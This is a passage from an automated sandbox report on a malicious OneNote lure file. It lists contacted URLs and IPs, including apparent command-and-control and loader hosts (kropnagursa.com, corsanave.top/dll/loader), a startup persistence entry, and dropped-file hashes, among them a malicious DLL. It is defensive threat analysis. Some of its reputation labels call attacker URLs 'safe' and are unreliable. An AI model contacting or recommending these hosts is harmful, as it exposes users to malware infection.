                                                  https://api.powerbi.com/v1.0/myorg/groups59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                    		high
                                                    https://web.microsoftstream.com/video/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                      		high
                                                      https://api.addins.store.officeppe.com/addinstemplate59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://graph.windows.net59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                        		high
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://consent.config.office.com/consentcheckin/v1.0/consents59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                            		high
                                                            https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                              		high
                                                              https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                		high
                                                                http://kropnagursa.com:80/wrundll32.exe, 0000000A.00000003.528347791.0000017521B90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://d.docs.live.net59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://ncus.contentsync.59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                  		high
                                                                  http://weather.service.msn.com/data.aspx59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                    		high
                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                      		high
                                                                      https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                        		high
                                                                        https://pushchannel.1drv.ms59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                          		high
                                                                          https://wus2.contentsync.59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://clients.config.office.net/user/v1.0/ios59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                            		high
                                                                            https://o365auditrealtimeingestion.manage.office.com59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                              		high
                                                                              https://outlook.office365.com/api/v1.0/me/Activities59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                		high
                                                                                http://pesterbdd.com/images/Pester.pngDpowershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://clients.config.office.net/user/v1.0/android/policies59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                  		high
                                                                                  https://entitlement.diagnostics.office.com59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                    		high
                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                      		high
                                                                                      https://outlook.office.com/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                        		high
                                                                                        https://storage.live.com/clientlogs/uploadlocation59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                          		high
                                                                                          http://kropnagursa.com/erundll32.exe, 0000000A.00000003.520617159.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.511045925.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.493439373.0000017521B6A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.456819458.0000017521B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://kropnagursa.com/frundll32.exe, 0000000A.00000003.804410969.0000017521BCF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.805944189.0000017521BCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://substrate.office.com/search/api/v1/SearchHistory59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                            		high
                                                                                            http://kropnagursa.com/brundll32.exe, 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://kropnagursa.com/Xrundll32.exe, 0000000A.00000003.817730546.0000017521BCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://clients.config.office.net/c2r/v1.0/InteractiveInstallation59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                              		high
                                                                                              https://graph.windows.net/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                		high
                                                                                                https://devnull.onenote.com59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                  		high
                                                                                                  https://messaging.office.com/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                    		high
                                                                                                    http://kropnagursa.com/hrundll32.exe, 0000000A.00000003.802843120.0000017521BCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.804410969.0000017521BCF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.805944189.0000017521BCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                      		high
                                                                                                      https://skyapi.live.net/Activity/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://api.cortana.ai59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://messaging.action.office.com/setcampaignaction59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                        		high
                                                                                                        https://visio.uservoice.com/forums/368202-visio-on-devices59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                          		high
                                                                                                          https://staging.cortana.ai59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://onedrive.live.com/embed?59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                            		high
                                                                                                            https://augloop.office.com59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                              		high
                                                                                                              https://api.diagnosticssdf.office.com/v2/file59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                		high
                                                                                                                https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                  		high
                                                                                                                  https://api.diagnostics.office.com59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                    		high
                                                                                                                    https://store.office.de/addinstemplate59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                      		high
                                                                                                                      http://kropnagursa.com:80/rundll32.exe, 0000000A.00000003.475037143.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.493439373.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.436721664.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.462327553.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.511045925.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.468772863.0000017521B90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.835726070.0000017521B90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://wus2.pagecontentsync.59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://api.powerbi.com/v1.0/myorg/datasets59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                        		high
                                                                                                                        http://kropnagursa.com/1mrundll32.exe, 0000000A.00000003.466473675.0000017521B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://cortana.ai/api59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://api.diagnosticssdf.office.com59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                          		high
                                                                                                                          https://login.microsoftonline.com/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                            		high
                                                                                                                            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                              		high
                                                                                                                              https://api.addins.omex.office.net/appinfo/query59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                		high
                                                                                                                                https://clients.config.office.net/user/v1.0/tenantassociationkey59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://powerlift.acompli.net59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  http://corsanave.top/dll/loader_Dpowershell.exe, 00000004.00000002.433111959.0000000004A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://cortana.ai59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://cloudfiles.onenote.com/upload.aspx59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://entitlement.diagnosticssdf.office.com59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://ofcrecsvcapi-int.azurewebsites.net/59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		low
                                                                                                                                        http://corsanave.top4powershell.exe, 00000004.00000002.433111959.0000000004D6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://portal.office.com/account/?ref=ClientMeControl59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://graph.ppe.windows.net59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://powerlift-frontdesk.acompli.net59B62DEA-C2F3-4733-9A17-563FBD67F4C3.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown

                                                                                                                                            World Map of Contacted IPs

                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs

                                                                                                                                            Public IPs

                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            46.151.26.131
                                                                                                                                            		corsanave.topRussian Federation
                                                                                                                                            		49608T4D_RU-ASRUfalse
                                                                                                                                            45.61.136.59
                                                                                                                                            		kropnagursa.comUnited States
                                                                                                                                            		40676AS40676UStrue

                                                                                                                                            Private

                                                                                                                                            IP
                                                                                                                                            192.168.2.1

                                                                                                                                            General Information

                                                                                                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                            Analysis ID:797394
                                                                                                                                            Start date and time:2023-02-02 21:15:05 +01:00
                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 10m 26s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:full
                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                            Number of analysed new started processes analysed:14
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • HDC enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Sample file name:Inv_02_02_#6.one
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal100.troj.evad.winONE@13/603@315/3
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 66.7%
                                                                                                                                            HDC Information:
                                                                                                                                            • Successful, ratio: 91.7% (good quality ratio 67%)
                                                                                                                                            • Quality average: 55.8%
                                                                                                                                            • Quality standard deviation: 40%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 98%
                                                                                                                                            • Number of executed functions: 71
                                                                                                                                            • Number of non-executed functions: 48
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .one
                                                                                                                                            • Override analysis time to 240s for rundll32

                                                                                                                                            Warnings

                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, rundll32.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.88.191, 20.224.201.79, 20.231.69.218
                                                                                                                                            • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, officeclient.microsoft.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 2100 because there are no executed function
                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                            • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                            • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                            • VT rate limit hit for: Inv_02_02_#6.one

                                                                                                                                            Simulations

                                                                                                                                            Behavior and APIs

                                                                                                                                            TimeTypeDescription
                                                                                                                                            21:16:23AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
                                                                                                                                            21:16:41API Interceptor23x Sleep call for process: powershell.exe modified
                                                                                                                                            21:16:57API Interceptor571x Sleep call for process: rundll32.exe modified

                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                            IPs

                                                                                                                                            No context

                                                                                                                                            Domains

                                                                                                                                            No context

                                                                                                                                            ASNs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            AS40676USsAzDEvVg8K.docGet hashmaliciousBrowse
                                                                                                                                            • 107.160.74.134
                                                                                                                                            sAzDEvVg8K.docGet hashmaliciousBrowse
                                                                                                                                            • 107.160.74.134
                                                                                                                                            tmpCB8E.htmGet hashmaliciousBrowse
                                                                                                                                            • 172.107.174.59
                                                                                                                                            VtAedZKmqz.elfGet hashmaliciousBrowse
                                                                                                                                            • 172.107.96.152
                                                                                                                                            Booking Details.docx.docGet hashmaliciousBrowse
                                                                                                                                            • 107.160.74.134
                                                                                                                                            Booking Details.docx.docGet hashmaliciousBrowse
                                                                                                                                            • 107.160.74.134
                                                                                                                                            sinax.elfGet hashmaliciousBrowse
                                                                                                                                            • 45.43.18.14
                                                                                                                                            sshd.elfGet hashmaliciousBrowse
                                                                                                                                            • 45.43.18.14
                                                                                                                                            pwer.elfGet hashmaliciousBrowse
                                                                                                                                            • 45.43.18.14
                                                                                                                                            SetupWin25-01-202303-07-46.exeGet hashmaliciousBrowse
                                                                                                                                            • 45.61.138.171
                                                                                                                                            SetupWin25-01-202303-07-46.exeGet hashmaliciousBrowse
                                                                                                                                            • 45.61.138.171
                                                                                                                                            I7F04x2WY4.elfGet hashmaliciousBrowse
                                                                                                                                            • 206.201.59.4
                                                                                                                                            SetupWin24-01-202317-01-50.exeGet hashmaliciousBrowse
                                                                                                                                            • 45.61.138.171
                                                                                                                                            SetupWin24-01-202317-01-50.exeGet hashmaliciousBrowse
                                                                                                                                            • 45.61.138.171
                                                                                                                                            S1iAwxHShu.elfGet hashmaliciousBrowse
                                                                                                                                            • 104.216.251.63
                                                                                                                                            08MjqwvfUc.elfGet hashmaliciousBrowse
                                                                                                                                            • 104.217.130.181
                                                                                                                                            wf5nAcVPV1.elfGet hashmaliciousBrowse
                                                                                                                                            • 45.35.217.102
                                                                                                                                            #Ud83d#Udce0 1 of 2 Pages.htmGet hashmaliciousBrowse
                                                                                                                                            • 136.0.111.91
                                                                                                                                            https://h-kd0.shop/?e=Y2xhaXJlLndpbmZpZWxkYWxlQG53bGVpY2VzdGVyc2hpcmUuZ292LnVrGet hashmaliciousBrowse
                                                                                                                                            • 45.61.136.136
                                                                                                                                            9Ae14NP2Gb.elfGet hashmaliciousBrowse
                                                                                                                                            • 103.231.185.66

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            No context

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            C:\Users\user\AppData\Local\MZvYng.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1597952
                                                                                                                                            Entropy (8bit):6.641102694446937
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:hcRMa3K/PnpGfGhIdcVveLeYexbQolwiWQoWF8TRthGpshSMXl/5y0Z:p/P2zKVveLeYexlwiSWF8TRWo
                                                                                                                                            MD5:C91EBC60C9BFFE8C2AB0151400DA28A3
                                                                                                                                            SHA1:8EFB734B9381544D86B4B93898D0456079FA20E1
                                                                                                                                            SHA-256:285D6BE8BFC162C6A91F7785C3ED650EA775B4BDA2925521BABFC09656024F20
                                                                                                                                            SHA-512:977D301F753BBAA65640325170AE44C5A6827D6341427B44F94B6D0C4CF2081F218DBFF5726F991F7F3821BA7782FCDDECFBDA51E269B8AC5E47B32057734F80
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d................." .........P......................................................._....`.........................................P...4P......@...............(w..............D...........................hq..(....................!......(........................text...'........................... ..`.rdata.............................@..@.buildid............................@..@.data....G..........................@....pdata..(w.......x..................@..@.tls....(...........................@....rsrc...k5.......@..................@..@.reloc..D............F..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\59B62DEA-C2F3-4733-9A17-563FBD67F4C3

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):152234
                                                                                                                                            Entropy (8bit):5.355988815284147
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:M+C7/gfYBIB9guwULQ9DQN+zQKk4F77nXmvidlXRcE6Lcz6I:ymQ9DQN+zpX/l
                                                                                                                                            MD5:9021711FB54199B632BA3AEDE4AE2D67
                                                                                                                                            SHA1:1D1A65F81523107A8C37B4811C5F7E1B4FB6A724
                                                                                                                                            SHA-256:885FA9323048AE3ED931303011CADB5F6896FF9C7A2123C496CCB07A25508178
                                                                                                                                            SHA-512:EF69C7CAFB1C1897A3CDB39055BBE1805830A87951F88F87EF792FF27C594C90934E84C5F4E29AF388215A329E13F52FC3556D7FB25E6A194CB95DF00F4AE85F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-02-02T20:15:57">.. Build: 16.0.16130.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\Quick Notes.one (On 2-2-2023).one (copy)

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):360056
                                                                                                                                            Entropy (8bit):7.518390668746009
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:JTqQd5d1QI6vUih4AIqECkIwx5HUvFOAjNPyFj8XTcrOQMpuNBSbFA:/d5d1AvUiWqrkIwx5wOuqF2TcOQMBbO
                                                                                                                                            MD5:ED9C9D864F1AAEC9CEBCCFD7B2DE3C20
                                                                                                                                            SHA1:419EE0B73A270F7CFCE5ED1DFBB35CA7A72E717C
                                                                                                                                            SHA-256:A62E7ABF32C8CEEF28B2DC6A2894AB686B130E2089AB746A9242CFD808A90790
                                                                                                                                            SHA-512:9ED959D1862D5E147DD6797EEB6F92542E841FEB70BE674A9A44A4E8ECD7E1FD0CB8D4158C6E0FDF6C37F347CAB7E22C6F84D70901FC2F74B4FB354E61D4C7D3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.R\{..M..Sx.)..|..U.G.F.u9..Y................?.....I.......*...*...*...*...................a....................................................z..................h...........................x~......0..........=ZV.L...i..K.k.........c>..L.v.."..j.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\My Notebook\~Quick Notes.one.onebackupconstruction

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:modified
                                                                                                                                            Size (bytes):360056
                                                                                                                                            Entropy (8bit):7.518390668746009
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:JTqQd5d1QI6vUih4AIqECkIwx5HUvFOAjNPyFj8XTcrOQMpuNBSbFA:/d5d1AvUiWqrkIwx5wOuqF2TcOQMBbO
                                                                                                                                            MD5:ED9C9D864F1AAEC9CEBCCFD7B2DE3C20
                                                                                                                                            SHA1:419EE0B73A270F7CFCE5ED1DFBB35CA7A72E717C
                                                                                                                                            SHA-256:A62E7ABF32C8CEEF28B2DC6A2894AB686B130E2089AB746A9242CFD808A90790
                                                                                                                                            SHA-512:9ED959D1862D5E147DD6797EEB6F92542E841FEB70BE674A9A44A4E8ECD7E1FD0CB8D4158C6E0FDF6C37F347CAB7E22C6F84D70901FC2F74B4FB354E61D4C7D3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.R\{..M..Sx.)..|..U.G.F.u9..Y................?.....I.......*...*...*...*...................a....................................................z..................h...........................x~......0..........=ZV.L...i..K.k.........c>..L.v.."..j.............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\Inv_02_02_#6.one (On 2-2-2023).one (copy)

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):191528
                                                                                                                                            Entropy (8bit):7.4028767563938285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:AaA0YRw9/WITtTWR7IbNzvL1ahX0uWt4AJERnyNenUWHCoTCCCCCCCCCCCCCCCC2:ua9xytedL1AXG4iERBbRd6X
                                                                                                                                            MD5:A4CAE5A45446CE077092CC100C71DF65
                                                                                                                                            SHA1:B7BFCDAD88E9EEC160C3E7227F89FD540C4846F0
                                                                                                                                            SHA-256:C55FCDB2C979F2C98E5A926F7B4C3A7269267327D0C583A9CCB713548B77210E
                                                                                                                                            SHA-512:CC6D824EA0863DE9F436A87A1730E831CAD472D555E7A7257E1CF123C8576E1EFF303691EE973256903C310F3D4B9391E045F59045BEEA3C1021944B20BF7668
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.R\{..M..Sx.).......ID.[U#...q................?.....I.......*...*...*...*...........................................................................................h...........................(................5....-B.....f2.%.......*=g0.W.B...#................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\~Inv_02_02_#6.one.onebackupconstruction

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):191528
                                                                                                                                            Entropy (8bit):7.4028767563938285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:AaA0YRw9/WITtTWR7IbNzvL1ahX0uWt4AJERnyNenUWHCoTCCCCCCCCCCCCCCCC2:ua9xytedL1AXG4iERBbRd6X
                                                                                                                                            MD5:A4CAE5A45446CE077092CC100C71DF65
                                                                                                                                            SHA1:B7BFCDAD88E9EEC160C3E7227F89FD540C4846F0
                                                                                                                                            SHA-256:C55FCDB2C979F2C98E5A926F7B4C3A7269267327D0C583A9CCB713548B77210E
                                                                                                                                            SHA-512:CC6D824EA0863DE9F436A87A1730E831CAD472D555E7A7257E1CF123C8576E1EFF303691EE973256903C310F3D4B9391E045F59045BEEA3C1021944B20BF7668
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_MalOneNote, Description: Yara detected Malicious OneNote, Source: C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\Backup\Open Sections\~Inv_02_02_#6.one.onebackupconstruction, Author: Joe Security
                                                                                                                                            Preview:.R\{..M..Sx.).......ID.[U#...q................?.....I.......*...*...*...*...........................................................................................h...........................(................5....-B.....f2.%.......*=g0.W.B...#................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
